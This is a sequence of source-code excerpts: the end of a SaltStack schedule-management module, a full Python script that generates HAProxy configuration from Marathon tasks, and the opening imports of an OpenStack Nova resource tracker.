'func': 'modify',
'persist': False}
out = __salt__['event.fire'](event_data, 'manage_schedule')
if out:
ret['comment'] = 'Modified job: {0} in schedule.'.format(name)
else:
ret['comment'] = 'Failed to modify job {0} in schedule.'.format(name)
ret['result'] = False
return ret
def run_job(name, force=False):
'''
Run a scheduled job on the minion immediately
CLI Example:
.. code-block:: bash
salt '*' schedule.run_job job1
salt '*' schedule.run_job job1 force=True
Force the job to run even if it is disabled.
'''
ret = {'comment': [],
'result': True}
if not name:
ret['comment'] = 'Job name is required.'
ret['result'] = False
schedule = list_(show_all=True, return_yaml=False)
if name in schedule:
data = schedule[name]
if 'enabled' in data and not data['enabled'] and not force:
ret['comment'] = 'Job {0} is disabled.'.format(name)
else:
out = __salt__['event.fire']({'name': name, 'func': 'run_job'}, 'manage_schedule')
if out:
ret['comment'] = 'Scheduling Job {0} on minion.'.format(name)
else:
ret['comment'] = 'Failed to run job {0} on minion.'.format(name)
ret['result'] = False
else:
ret['comment'] = 'Job {0} does not exist.'.format(name)
ret['result'] = False
return ret
def enable_job(name, **kwargs):
'''
Enable a job in the minion's schedule
CLI Example:
.. code-block:: bash
salt '*' schedule.enable_job job1
'''
ret = {'comment': [],
'result': True}
if not name:
ret['comment'] = 'Job name is required.'
ret['result'] = False
if 'test' in __opts__ and __opts__['test']:
ret['comment'] = 'Job: {0} would be enabled in schedule.'.format(name)
else:
persist = True
if 'persist' in kwargs:
persist = kwargs['persist']
if name in list_(show_all=True, where='opts', return_yaml=False):
event_data = {'name': name, 'func': 'enable_job', 'persist': persist}
elif name in list_(show_all=True, where='pillar', return_yaml=False):
event_data = {'name': name, 'where': 'pillar', 'func': 'enable_job', 'persist': False}
else:
ret['comment'] = 'Job {0} does not exist.'.format(name)
ret['result'] = False
return ret
try:
eventer = salt.utils.event.get_event('minion', opts=__opts__)
res = __salt__['event.fire'](event_data, 'manage_schedule')
if res:
event_ret = eventer.get_event(tag='/salt/minion/minion_schedule_enabled_job_complete', wait=30)
if event_ret and event_ret['complete']:
schedule = event_ret['schedule']
# check item exists in schedule and is enabled
if name in schedule and schedule[name]['enabled']:
ret['result'] = True
ret['comment'] = 'Enabled Job {0} in schedule.'.format(name)
else:
ret['result'] = False
ret['comment'] = 'Failed to enable job {0} in schedule.'.format(name)
return ret
except KeyError:
# Effectively a no-op, since we can't really return without an event system
ret['comment'] = 'Event module not available. Schedule enable job failed.'
return ret
def disable_job(name, **kwargs):
'''
Disable a job in the minion's schedule
CLI Example:
.. code-block:: bash
salt '*' schedule.disable_job job1
'''
ret = {'comment': [],
'result': True}
if not name:
ret['comment'] = 'Job name is required.'
ret['result'] = False
if 'test' in kwargs and kwargs['test']:
ret['comment'] = 'Job: {0} would be disabled in schedule.'.format(name)
else:
persist = True
if 'persist' in kwargs:
persist = kwargs['persist']
if name in list_(show_all=True, where='opts', return_yaml=False):
event_data = {'name': name, 'func': 'disable_job', 'persist': persist}
elif name in list_(show_all=True, where='pillar'):
event_data = {'name': name, 'where': 'pillar', 'func': 'disable_job', 'persist': False}
else:
ret['comment'] = 'Job {0} does not exist.'.format(name)
ret['result'] = False
return ret
try:
eventer = salt.utils.event.get_event('minion', opts=__opts__)
res = __salt__['event.fire'](event_data, 'manage_schedule')
if res:
event_ret = eventer.get_event(tag='/salt/minion/minion_schedule_disabled_job_complete', wait=30)
if event_ret and event_ret['complete']:
schedule = event_ret['schedule']
# check item exists in schedule and is enabled
if name in schedule and not schedule[name]['enabled']:
ret['result'] = True
ret['comment'] = 'Disabled Job {0} in schedule.'.format(name)
else:
ret['result'] = False
ret['comment'] = 'Failed to disable job {0} in schedule.'.format(name)
return ret
except KeyError:
# Effectively a no-op, since we can't really return without an event system
ret['comment'] = 'Event module not available. Schedule enable job failed.'
return ret
def save(**kwargs):
'''
Save all scheduled jobs on the minion
CLI Example:
.. code-block:: bash
salt '*' schedule.save
'''
ret = {'comment': [],
'result': True}
if 'test' in kwargs and kwargs['test']:
ret['comment'] = 'Schedule would be saved.'
else:
try:
eventer = salt.utils.event.get_event('minion', opts=__opts__)
res = __salt__['event.fire']({'func': 'save_schedule'}, 'manage_schedule')
if res:
event_ret = eventer.get_event(tag='/salt/minion/minion_schedule_saved', wait=30)
if event_ret and event_ret['complete']:
ret['result'] = True
ret['comment'] = 'Schedule (non-pillar items) saved.'
else:
ret['result'] = False
ret['comment'] = 'Failed to save schedule.'
except KeyError:
# Effectively a no-op, since we can't really return without an event system
ret['comment'] = 'Event module not available. Schedule save failed.'
return ret
def enable(**kwargs):
'''
Enable all scheduled jobs on the minion
CLI Example:
.. code-block:: bash
salt '*' schedule.enable
'''
ret = {'comment': [],
'result': True}
if 'test' in kwargs and kwargs['test']:
ret['comment'] = 'Schedule would be enabled.'
else:
try:
eventer = salt.utils.event.get_event('minion', opts=__opts__)
res = __salt__['event.fire']({'func': 'enable'}, 'manage_schedule')
if res:
event_ret = eventer.get_event(tag='/salt/minion/minion_schedule_enabled_complete', wait=30)
if event_ret and event_ret['complete']:
schedule = event_ret['schedule']
if 'enabled' in schedule and schedule['enabled']:
ret['result'] = True
ret['comment'] = 'Enabled schedule on minion.'
else:
ret['result'] = False
ret['comment'] = 'Failed to enable schedule on minion.'
return ret
except KeyError:
# Effectively a no-op, since we can't really return without an event system
ret['comment'] = 'Event module not available. Schedule enable job failed.'
return ret
def disable(**kwargs):
'''
Disable all scheduled jobs on the minion
CLI Example:
.. code-block:: bash
salt '*' schedule.disable
'''
ret = {'comment': [],
'result': True}
if 'test' in kwargs and kwargs['test']:
ret['comment'] = 'Schedule would be disabled.'
else:
try:
eventer = salt.utils.event.get_event('minion', opts=__opts__)
res = __salt__['event.fire']({'func': 'disable'}, 'manage_schedule')
if res:
event_ret = eventer.get_event(tag='/salt/minion/minion_schedule_disabled_complete', wait=30)
if event_ret and event_ret['complete']:
schedule = event_ret['schedule']
if 'enabled' in schedule and not schedule['enabled']:
ret['result'] = True
ret['comment'] = 'Disabled schedule on minion.'
else:
ret['result'] = False
ret['comment'] = 'Failed to disable schedule on minion.'
return ret
except KeyError:
# Effectively a no-op, since we can't really return without an event system
ret['comment'] = 'Event module not available. Schedule enable job failed.'
return ret
def reload_():
'''
Reload saved scheduled jobs on the minion
CLI Example:
.. code-block:: bash
salt '*' schedule.reload
'''
ret = {'comment': [],
'result': True}
# If there a schedule defined in pillar, refresh it.
if 'schedule' in __pillar__:
out = __salt__['event.fire']({}, 'pillar_refresh')
if out:
ret['comment'].append('Reloaded schedule from pillar on minion.')
else:
ret['comment'].append('Failed to reload schedule from pillar on minion.')
ret['result'] = False
# move this file into an configurable opt
sfn = '{0}/{1}/schedule.conf'.format(__opts__['config_dir'], os.path.dirname(__opts__['default_include']))
if os.path.isfile(sfn):
with salt.utils.fopen(sfn, 'rb') as fp_:
try:
schedule = yaml.safe_load(fp_.read())
except yaml.YAMLError as exc:
ret['comment'].append('Unable to read existing schedule file: {0}'.format(exc))
if schedule:
if 'schedule' in schedule and schedule['schedule']:
out = __salt__['event.fire']({'func': 'reload', 'schedule': schedule}, 'manage_schedule')
if out:
ret['comment'].append('Reloaded schedule on minion from schedule.conf.')
else:
ret['comment'].append('Failed to reload schedule on minion from schedule.conf.')
ret['result'] = False
else:
ret['comment'].append('Failed to reload schedule on minion. Saved file is empty or invalid.')
ret['result'] = False
else:
ret['comment'].append('Failed to reload schedule on minion. Saved file is empty or invalid.')
ret['result'] = False
return ret
def move(name, target, **kwargs):
'''
Move scheduled job to another minion or minions.
CLI Example:
.. code-block:: bash
salt '*' schedule.move jobname target
'''
ret = {'comment': [],
'result': True}
if not name:
ret['comment'] = 'Job name is required.'
ret['result'] = False
if 'test' in kwargs and kwargs['test']:
ret['comment'] = 'Job: {0} would be moved from schedule.'.format(name)
else:
opts_schedule = list_(show_all=True, where='opts', return_yaml=False)
pillar_schedule = list_(show_all=True, where='pillar', return_yaml=False)
if name in opts_schedule:
schedule_data = opts_schedule[name]
where = None
elif name in pillar_schedule:
schedule_data = pillar_schedule[name]
where = 'pillar'
else:
ret['comment'] = 'Job {0} does not exist.'.format(name)
ret['result'] = False
return ret
schedule_opts = []
for key, value in six.iteritems(schedule_data):
temp = '{0}={1}'.format(key, value)
schedule_opts.append(temp)
response = __salt__['publish.publish'](target, 'schedule.add', schedule_opts)
# Get errors and list of affeced minions
errors = []
minions = []
for minion in response:
minions.append(minion)
if not response[minion]:
errors.append(minion)
# parse response
if not response:
ret['comment'] = 'no servers answered the published schedule.add command'
return ret
elif len(errors) > 0:
ret['comment'] = 'the following minions return False'
ret['minions'] = errors
return ret
else:
delete(name, where=where)
ret['result'] = True
ret['comment'] = 'Moved Job {0} from schedule.'.format(name)
ret['minions'] = minions
return ret
return ret
def copy(name, target, **kwargs):
'''
Copy scheduled job to another minion or minions.
CLI Example:
.. code-block:: bash
salt '*' schedule.copy jobname target
'''
ret = {'comment': [],
'result': True}
if not name:
ret['comment'] = 'Job name is required.'
ret['result'] = False
if 'test' in kwargs and kwargs['test']:
ret['comment'] = 'Job: {0} would be copied from schedule.'.format(name)
else:
opts_schedule = list_(show_all=True, where='opts', return_yaml=False)
pillar_schedule = list_(show_all=True, where='pillar', return_yaml=False)
if name in opts_schedule:
schedule_data = opts_schedule[name]
elif name in pillar_schedule:
schedule_data = pillar_schedule[name]
else:
ret['comment'] = 'Job {0} does not exist.'.format(name)
ret['result'] = False
return ret
schedule_opts = []
for key, value in six.iteritems(schedule_data):
temp = '{0}={1}'.format(key, value)
schedule_opts.append(temp)
response = __salt__['publish.publish'](target, 'schedule.add', schedule_opts)
# Get errors and list of affeced minions
errors = []
minions = []
for minion in response:
minions.append(minion)
if not response[minion]:
errors.append(minion)
# parse response
if not response:
ret['comment'] = 'no servers answered the published schedule.add command'
return ret
elif len(errors) > 0:
ret['comment'] = 'the following minions return False'
ret['minions'] = errors
return ret
else:
ret['result'] = True
ret['comment'] = 'Copied Job {0} from schedule to minion(s).'.format(name)
ret['minions'] = minions
return ret
return ret
|
|
#!/usr/bin/env python2
"""Overview:
The servicerouter is a replacement for the haproxy-marathon-bridge.
It reads the Marathon task information and dynamically generates
haproxy configuration details.
To gather the task information, the servicerouter needs to know where
to find Marathon. The service configuration details are stored in Marathon
environment variables.
Every service port in Marathon can be configured independently.
Features:
- Virtual Host aliases for services
- Soft restart of haproxy
- SSL Termination
- (Optional): real-time update from Marathon events
Configuration:
Service configuration lives in Marathon via environment variables.
The servicerouter just needs to know where to find marathon.
To run in listening mode you must also specify the address + port at
which the servicerouter can be reached by marathon.
Usage:
$ servicerouter.py --marathon http://marathon1:8080 \
--haproxy-config /etc/haproxy/haproxy.cfg
The user that executes servicerouter must have the permission to reload
haproxy.
Environment Variables:
HAPROXY_GROUP
The group of servicerouter instances that point to the service.
Service routers with the group '*' will collect all groups.
HAPROXY_{n}_VHOST
The Marathon HTTP Virtual Host proxy hostname to gather.
Ex: HAPROXY_0_VHOST = 'marathon.mesosphere.com'
HAPROXY_{n}_STICKY
Enable sticky request routing for the service.
Ex: HAPROXY_0_STICKY = true
HAPROXY_{n}_REDIRECT_TO_HTTPS
Redirect HTTP traffic to HTTPS.
Ex: HAPROXY_0_REDIRECT_TO_HTTPS = true
HAPROXY_{n}_SSL_CERT
Enable the given SSL certificate for TLS/SSL traffic.
Ex: HAPROXY_0_SSL_CERT = '/etc/ssl/certs/marathon.mesosphere.com'
HAPROXY_{n}_BIND_ADDR
Bind to the specific address for the service.
Ex: HAPROXY_0_BIND_ADDR = '10.0.0.42'
HAPROXY_{n}_PORT
Bind to the specific port for the service.
This overrides the servicePort which has to be unique.
Ex: HAPROXY_0_PORT = 80
HAPROXY_{n}_MODE
Set the connection mode to either TCP or HTTP. The default is TCP.
Ex: HAPROXY_0_MODE = 'http'
Templates:
The servicerouter searches for configuration files in the templates/
directory. The templates/ directory contains servicerouter configuration
settings and example usage. The templates/ directory is located in a relative
path from where the script is run.
HAPROXY_HEAD
The head of the haproxy config. This contains global settings
and defaults.
HAPROXY_HTTP_FRONTEND_HEAD
An HTTP frontend that binds to port *:80 by default and gathers
all virtual hosts as defined by the HAPROXY_{n}_VHOST variable.
HAPROXY_HTTPS_FRONTEND_HEAD
An HTTPS frontend for encrypted connections that binds to port *:443 by
default and gathers all virtual hosts as defined by the
HAPROXY_{n}_VHOST variable. You must modify this file to
include your certificate.
HAPROXY_BACKEND_REDIRECT_HTTP_TO_HTTPS
This template is used with backends where the
HAPROXY_{n}_REDIRECT_TO_HTTPS environment variable is defined.
HAPROXY_BACKEND_HTTP_OPTIONS
Sets HTTP headers, for example X-Forwarded-For and X-Forwarded-Proto.
HAPROXY_BACKEND_STICKY_OPTIONS
Sets a cookie for services where HAPROXY_{n}_STICKY is true.
HAPROXY_FRONTEND_HEAD
Defines the address and port to bind to.
HAPROXY_BACKEND_HEAD
Defines the type of load balancing, roundrobin by default,
and connection mode, TCP or HTTP.
HAPROXY_HTTP_FRONTEND_ACL
The ACL that glues a backend to the corresponding virtual host
of the HAPROXY_HTTP_FRONTEND_HEAD.
HAPROXY_HTTPS_FRONTEND_ACL
The ACL that performs the SNI based hostname matching
for the HAPROXY_HTTPS_FRONTEND_HEAD.
HAPROXY_BACKEND_SERVER_OPTIONS
The options for each physical server added to a backend.
HAPROXY_FRONTEND_BACKEND_GLUE
This option glues the backend to the frontend.
Operational Notes:
- When a node in listening mode fails, remove the callback url for that
node in marathon.
"""
from logging.handlers import SysLogHandler
from operator import attrgetter
from shutil import move
from tempfile import mkstemp
from textwrap import dedent
from wsgiref.simple_server import make_server
import argparse
import json
import logging
import os.path
import re
import requests
import subprocess
import sys
class ConfigTemplater(object):
HAPROXY_HEAD = dedent('''\
global
daemon
log 127.0.0.1 local0
log 127.0.0.1 local1 notice
maxconn 4096
tune.ssl.default-dh-param 2048
defaults
log global
retries 3
maxconn 2000
timeout connect 5s
timeout client 50s
timeout server 50s
listen stats
bind 127.0.0.1:9090
balance
mode http
stats enable
stats auth admin:admin
''')
HAPROXY_HTTP_FRONTEND_HEAD = dedent('''
frontend marathon_http_in
bind *:80
mode http
''')
# TODO(lloesche): make certificate path dynamic and allow multiple certs
HAPROXY_HTTPS_FRONTEND_HEAD = dedent('''
frontend marathon_https_in
bind *:443 ssl crt /etc/ssl/mesosphere.com.pem
mode http
''')
HAPROXY_FRONTEND_HEAD = dedent('''
frontend {backend}
bind {bindAddr}:{servicePort}{sslCertOptions}
mode {mode}
''')
HAPROXY_BACKEND_HEAD = dedent('''
backend {backend}
balance roundrobin
mode {mode}
''')
HAPROXY_BACKEND_REDIRECT_HTTP_TO_HTTPS = '''\
bind {bindAddr}:80
redirect scheme https if !{{ ssl_fc }}
'''
HAPROXY_HTTP_FRONTEND_ACL = '''\
acl host_{cleanedUpHostname} hdr(host) -i {hostname}
use_backend {backend} if host_{cleanedUpHostname}
'''
HAPROXY_HTTPS_FRONTEND_ACL = '''\
use_backend {backend} if {{ ssl_fc_sni {hostname} }}
'''
HAPROXY_BACKEND_HTTP_OPTIONS = '''\
option forwardfor
http-request set-header X-Forwarded-Port %[dst_port]
http-request add-header X-Forwarded-Proto https if { ssl_fc }
'''
HAPROXY_BACKEND_STICKY_OPTIONS = '''\
cookie mesosphere_server_id insert indirect nocache
'''
HAPROXY_BACKEND_SERVER_OPTIONS = '''\
server {serverName} {host}:{port}{cookieOptions}
'''
HAPROXY_FRONTEND_BACKEND_GLUE = '''\
use_backend {backend}
'''
def __init__(self, directory='templates'):
self.__template_directory = directory
self.__load_templates()
def __load_templates(self):
'''Loads template files if they exist, othwerwise it sets defaults'''
variables = [
'HAPROXY_HEAD',
'HAPROXY_HTTP_FRONTEND_HEAD',
'HAPROXY_HTTPS_FRONTEND_HEAD',
'HAPROXY_FRONTEND_HEAD',
'HAPROXY_BACKEND_REDIRECT_HTTP_TO_HTTPS',
'HAPROXY_BACKEND_HEAD',
'HAPROXY_HTTP_FRONTEND_ACL',
'HAPROXY_HTTPS_FRONTEND_ACL',
'HAPROXY_BACKEND_HTTP_OPTIONS',
'HAPROXY_BACKEND_STICKY_OPTIONS',
'HAPROXY_BACKEND_SERVER_OPTIONS',
'HAPROXY_FRONTEND_BACKEND_GLUE',
]
for variable in variables:
try:
filename = os.path.join(self.__template_directory, variable)
with open(filename) as f:
logger.info('overriding %s from %s', variable, filename)
setattr(self, variable, f.read())
except IOError:
logger.debug("setting default value for %s", variable)
try:
setattr(self, variable, getattr(self.__class__, variable))
except AttributeError:
logger.exception('default not found, aborting.')
raise
@property
def haproxy_head(self):
return self.HAPROXY_HEAD
@property
def haproxy_http_frontend_head(self):
return self.HAPROXY_HTTP_FRONTEND_HEAD
@property
def haproxy_https_frontend_head(self):
return self.HAPROXY_HTTPS_FRONTEND_HEAD
@property
def haproxy_frontend_head(self):
return self.HAPROXY_FRONTEND_HEAD
@property
def haproxy_backend_redirect_http_to_https(self):
return self.HAPROXY_BACKEND_REDIRECT_HTTP_TO_HTTPS
@property
def haproxy_backend_head(self):
return self.HAPROXY_BACKEND_HEAD
@property
def haproxy_http_frontend_acl(self):
return self.HAPROXY_HTTP_FRONTEND_ACL
@property
def haproxy_https_frontend_acl(self):
return self.HAPROXY_HTTPS_FRONTEND_ACL
@property
def haproxy_backend_http_options(self):
return self.HAPROXY_BACKEND_HTTP_OPTIONS
@property
def haproxy_backend_sticky_options(self):
return self.HAPROXY_BACKEND_STICKY_OPTIONS
@property
def haproxy_backend_server_options(self):
return self.HAPROXY_BACKEND_SERVER_OPTIONS
@property
def haproxy_frontend_backend_glue(self):
return self.HAPROXY_FRONTEND_BACKEND_GLUE
def string_to_bool(s):
return s.lower() in ["true", "t", "yes", "y"]
def set_hostname(x, y):
x.hostname = y
def set_sticky(x, y):
x.sticky = string_to_bool(y)
def set_redirect_http_to_https(x, y):
x.redirectHttpToHttps = string_to_bool(y)
def set_sslCert(x, y):
x.sslCert = y
def set_bindAddr(x, y):
x.bindAddr = y
def set_port(x, y):
x.servicePort = int(y)
def set_mode(x, y):
x.mode = y
env_keys = {
'HAPROXY_{0}_VHOST': set_hostname,
'HAPROXY_{0}_STICKY': set_sticky,
'HAPROXY_{0}_REDIRECT_TO_HTTPS': set_redirect_http_to_https,
'HAPROXY_{0}_SSL_CERT': set_sslCert,
'HAPROXY_{0}_BIND_ADDR': set_bindAddr,
'HAPROXY_{0}_PORT': set_port,
'HAPROXY_{0}_MODE': set_mode
}
logger = logging.getLogger('servicerouter')
class MarathonBackend(object):
def __init__(self, host, port):
self.host = host
self.port = port
def __hash__(self):
return hash((self.host, self.port))
def __repr__(self):
return "MarathonBackend(%r, %r)" % (self.host, self.port)
class MarathonService(object):
def __init__(self, appId, servicePort):
self.appId = appId
self.servicePort = servicePort
self.backends = set()
self.hostname = None
self.sticky = False
self.redirectHttpToHttps = False
self.sslCert = None
self.bindAddr = '*'
self.mode = 'tcp'
self.groups = frozenset()
def add_backend(self, host, port):
self.backends.add(MarathonBackend(host, port))
def __hash__(self):
return hash(self.servicePort)
def __eq__(self, other):
return self.servicePort == other.servicePort
def __repr__(self):
return "MarathonService(%r, %r)" % (self.appId, self.servicePort)
class MarathonApp(object):
def __init__(self, marathon, appId):
self.app = marathon.get_app(appId)
self.groups = frozenset()
self.appId = appId
# port -> MarathonService
self.services = dict()
def __hash__(self):
return hash(self.appId)
def __eq__(self, other):
return self.appId == other.appId
class Marathon(object):
def __init__(self, hosts):
# TODO(cmaloney): Support getting master list from zookeeper
self.__hosts = hosts
def api_req_raw(self, method, path, body=None, **kwargs):
for host in self.__hosts:
path_str = os.path.join(host, 'v2')
if len(path) == 2:
assert(path[0] == 'apps')
path_str += '/apps/{0}'.format(path[1])
else:
path_str += '/' + path[0]
response = requests.request(
method,
path_str,
headers={
'Accept': 'application/json',
'Content-Type': 'application/json'
},
**kwargs
)
if response.status_code == 200:
break
response.raise_for_status()
return response
def api_req(self, method, path, **kwargs):
return self.api_req_raw(method, path, **kwargs).json()
def create(self, app_json):
return self.api_req('POST', ['apps'], app_json)
def get_app(self, appid):
return self.api_req('GET', ['apps', appid])["app"]
# Lists all running apps.
def list(self):
return self.api_req('GET', ['apps'])["apps"]
def tasks(self):
return self.api_req('GET', ['tasks'])["tasks"]
def add_subscriber(self, callbackUrl):
return self.api_req(
'POST',
['eventSubscriptions'],
params={'callbackUrl': callbackUrl})
def remove_subscriber(self, callbackUrl):
return self.api_req(
'DELETE',
['eventSubscriptions'],
params={'callbackUrl': callbackUrl})
def has_group(groups, app_groups):
# All groups / wildcard match
if '*' in groups:
return True
# empty group only
if len(groups) == 0 and len(app_groups) == 0:
return True
# Contains matching groups
if (len(frozenset(app_groups) & groups)):
return True
return False
def config(apps, groups):
logger.info("generating config")
templater = ConfigTemplater()
config = templater.haproxy_head
groups = frozenset(groups)
http_frontends = templater.haproxy_http_frontend_head
https_frontends = templater.haproxy_https_frontend_head
frontends = str()
backends = str()
for app in sorted(apps, key=attrgetter('appId', 'servicePort')):
# App only applies if we have it's group
if not has_group(groups, app.groups):
continue
logger.debug("configuring app %s", app.appId)
backend = app.appId[1:].replace('/', '_') + '_' + str(app.servicePort)
logger.debug("frontend at %s:%d with backend %s",
app.bindAddr, app.servicePort, backend)
# if the app has a hostname set force mode to http
# otherwise recent versions of haproxy refuse to start
if app.hostname:
app.mode = 'http'
frontend_head = templater.haproxy_frontend_head
frontends += frontend_head.format(
bindAddr=app.bindAddr,
backend=backend,
servicePort=app.servicePort,
mode=app.mode,
sslCertOptions=' ssl crt ' + app.sslCert if app.sslCert else ''
)
if app.redirectHttpToHttps:
logger.debug("rule to redirect http to https traffic")
haproxy_backend_redirect_http_to_https = \
templater.haproxy_backend_redirect_http_to_https
frontends += haproxy_backend_redirect_http_to_https.format(
bindAddr=app.bindAddr)
backend_head = templater.haproxy_backend_head
backends += backend_head.format(
backend=backend,
mode=app.mode
)
# if a hostname is set we add the app to the vhost section
# of our haproxy config
# TODO(lloesche): Check if the hostname is already defined by another
# service
if app.hostname:
logger.debug(
"adding virtual host for app with hostname %s", app.hostname)
cleanedUpHostname = re.sub(r'[^a-zA-Z0-9\-]', '_', app.hostname)
http_frontend_acl = templater.haproxy_http_frontend_acl
http_frontends += http_frontend_acl.format(
cleanedUpHostname=cleanedUpHostname,
hostname=app.hostname,
backend=backend
)
https_frontend_acl = templater.haproxy_https_frontend_acl
https_frontends += https_frontend_acl.format(
hostname=app.hostname,
backend=backend
)
backends += templater.haproxy_backend_http_options
if app.sticky:
logger.debug("turning on sticky sessions")
backends += templater.haproxy_backend_sticky_options
frontend_backend_glue = templater.haproxy_frontend_backend_glue
frontends += frontend_backend_glue.format(backend=backend)
key_func = attrgetter('host', 'port')
for backendServer in sorted(app.backends, key=key_func):
logger.debug(
"backend server at %s:%d",
backendServer.host,
backendServer.port)
serverName = re.sub(
r'[^a-zA-Z0-9\-]', '_',
backendServer.host + '_' + str(backendServer.port))
backend_server_options = templater.haproxy_backend_server_options
backends += backend_server_options.format(
host=backendServer.host,
port=backendServer.port,
serverName=serverName,
cookieOptions=' check cookie ' +
serverName if app.sticky else ''
)
config += http_frontends
config += https_frontends
config += frontends
config += backends
return config
def reloadConfig():
logger.debug("trying to find out how to reload the configuration")
if os.path.isfile('/etc/init/haproxy.conf'):
logger.debug("we seem to be running on an Upstart based system")
reloadCommand = ['reload', 'haproxy']
elif (os.path.isfile('/usr/lib/systemd/system/haproxy.service') or
os.path.isfile('/etc/systemd/system/haproxy.service')):
logger.debug("we seem to be running on systemd based system")
reloadCommand = ['systemctl', 'reload', 'haproxy']
else:
logger.debug("we seem to be running on a sysvinit based system")
reloadCommand = ['/etc/init.d/haproxy', 'reload']
logger.info("reloading using %s", " ".join(reloadCommand))
try:
subprocess.check_call(reloadCommand)
except OSError as ex:
logger.error("unable to reload config using command %s",
" ".join(reloadCommand))
logger.error("OSError: %s", ex)
except subprocess.CalledProcessError as ex:
logger.error("unable to reload config using command %s",
" ".join(reloadCommand))
logger.error("reload returned non-zero: %s", ex)
def writeConfig(config, config_file):
# Write config to a temporary location
fd, haproxyTempConfigFile = mkstemp()
logger.debug("writing config to temp file %s", haproxyTempConfigFile)
with os.fdopen(fd, 'w') as haproxyTempConfig:
haproxyTempConfig.write(config)
# Move into place
logger.debug("moving temp file %s to %s",
haproxyTempConfigFile,
config_file)
move(haproxyTempConfigFile, config_file)
def compareWriteAndReloadConfig(config, config_file):
# See if the last config on disk matches this, and if so don't reload
# haproxy
runningConfig = str()
try:
logger.debug("reading running config from %s", config_file)
with open(config_file, "r") as f:
runningConfig = f.read()
except IOError:
logger.warning("couldn't open config file for reading")
if runningConfig != config:
logger.info(
"running config is different from generated config - reloading")
writeConfig(config, config_file)
reloadConfig()
def get_apps(marathon):
tasks = marathon.tasks()
apps = dict()
for task in tasks:
# For each task, extract the app it belongs to and add a
# backend for each service it provides
if 'servicePorts' not in task:
continue
for i in xrange(len(task['servicePorts'])):
# Marathon 0.7.6 bug workaround
if len(task['host']) == 0:
logger.warning("Ignoring Marathon task without host " +
task['id'])
continue
servicePort = task['servicePorts'][i]
port = task['ports'][i] if len(task['ports']) else servicePort
appId = task['appId']
if appId not in apps:
app_tmp = MarathonApp(marathon, appId)
if 'HAPROXY_GROUP' in app_tmp.app['env']:
app_tmp.groups = \
app_tmp.app['env']['HAPROXY_GROUP'].split(',')
apps[appId] = app_tmp
app = apps[appId]
if servicePort not in app.services:
app.services[servicePort] = MarathonService(
appId, servicePort)
service = app.services[servicePort]
service.groups = app.groups
# Load environment variable configuration
# TODO(cmaloney): Move to labels once those are supported
# throughout the stack
for key_unformatted in env_keys:
key = key_unformatted.format(i)
if key in app.app[u'env']:
func = env_keys[key_unformatted]
func(service, app.app[u'env'][key])
service.add_backend(task['host'], port)
# Convert into a list for easier consumption
apps_list = list()
for app in apps.values():
for service in app.services.values():
apps_list.append(service)
return apps_list
def regenerate_config(apps, config_file, groups):
compareWriteAndReloadConfig(config(apps, groups), config_file)
class MarathonEventSubscriber(object):
def __init__(self, marathon, addr, config_file, groups):
marathon.add_subscriber(addr)
self.__marathon = marathon
# appId -> MarathonApp
self.__apps = dict()
self.__config_file = config_file
self.__groups = groups
# Fetch the base data
self.reset_from_tasks()
def reset_from_tasks(self):
self.__apps = get_apps(self.__marathon)
regenerate_config(self.__apps, self.__config_file, self.__groups)
def handle_event(self, event):
if event['eventType'] == 'status_update_event':
# TODO (cmaloney): Handle events more intelligently so we don't
# unnecessarily hammer the Marathon API.
self.reset_from_tasks()
def get_arg_parser():
parser = argparse.ArgumentParser(
description="Marathon HAProxy Service Router")
parser.add_argument("--longhelp",
help="Print out configuration details",
action="store_true"
)
parser.add_argument("--marathon", "-m",
nargs="+",
help="Marathon endpoint, eg. -m " +
"http://marathon1:8080 -m http://marathon2:8080"
)
parser.add_argument("--listening", "-l",
help="The HTTP address that Marathon can call this " +
"script back at (http://lb1:8080)"
)
default_log_socket = "/dev/log"
if sys.platform == "darwin":
default_log_socket = "/var/run/syslog"
parser.add_argument("--syslog-socket",
help="Socket to write syslog messages to",
default=default_log_socket
)
parser.add_argument("--haproxy-config",
help="Location of haproxy configuration",
default="/etc/haproxy/haproxy.cfg"
)
parser.add_argument("--group",
help="Only generate config for apps which list the "
"specified names. Defaults to apps without groups. "
"Use '*' to match all groups",
action="append",
default=list())
return parser
def run_server(marathon, callback_url, config_file, groups):
subscriber = MarathonEventSubscriber(marathon,
callback_url,
config_file,
groups)
# TODO(cmaloney): Switch to a sane http server
# TODO(cmaloney): Good exception catching, etc
def wsgi_app(env, start_response):
length = int(env['CONTENT_LENGTH'])
data = env['wsgi.input'].read(length)
subscriber.handle_event(json.loads(data))
# TODO(cmaloney): Make this have a simple useful webui for debugging /
# monitoring
start_response('200 OK', [('Content-Type', 'text/html')])
return "Got it\n"
try:
port = int(callback_url.split(':')[-1])
except ValueError:
port = 8000 # no port or invalid port specified
logger.info("Serving on port {}...".format(port))
httpd = make_server('', port, wsgi_app)
httpd.serve_forever()
def setup_logging(syslog_socket):
logger.setLevel(logging.DEBUG)
syslogHandler = SysLogHandler(args.syslog_socket)
consoleHandler = logging.StreamHandler()
formatter = logging.Formatter('%(name)s: %(message)s')
syslogHandler.setFormatter(formatter)
consoleHandler.setFormatter(formatter)
# syslogHandler.setLevel(logging.ERROR)
logger.addHandler(syslogHandler)
logger.addHandler(consoleHandler)
if __name__ == '__main__':
# Process arguments
arg_parser = get_arg_parser()
args = arg_parser.parse_args()
# Print the long help text if flag is set
if args.longhelp:
print __doc__
sys.exit()
# otherwise make sure that a Marathon URL was specified
else:
if args.marathon is None:
arg_parser.error('argument --marathon/-m is required')
# Setup logging
setup_logging(args.syslog_socket)
# Marathon API connector
marathon = Marathon(args.marathon)
# If in listening mode, spawn a webserver waiting for events. Otherwise
# just write the config.
if args.listening:
run_server(marathon, args.listening, args.haproxy_config, args.group)
else:
# Generate base config
regenerate_config(get_apps(marathon), args.haproxy_config, args.group)
|
|
# Copyright (c) 2012 OpenStack, LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Track resources like memory and disk for a compute host. Provides the
scheduler with useful information about availability through the ComputeNode
model.
"""
from nova.compute import claims
from nova.compute import instance_types
from nova.compute import task_states
from nova.compute import vm_states
from nova import conductor
from nova import context
from nova import db
from nova import exception
from nova.openstack.common import cfg
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import lockutils
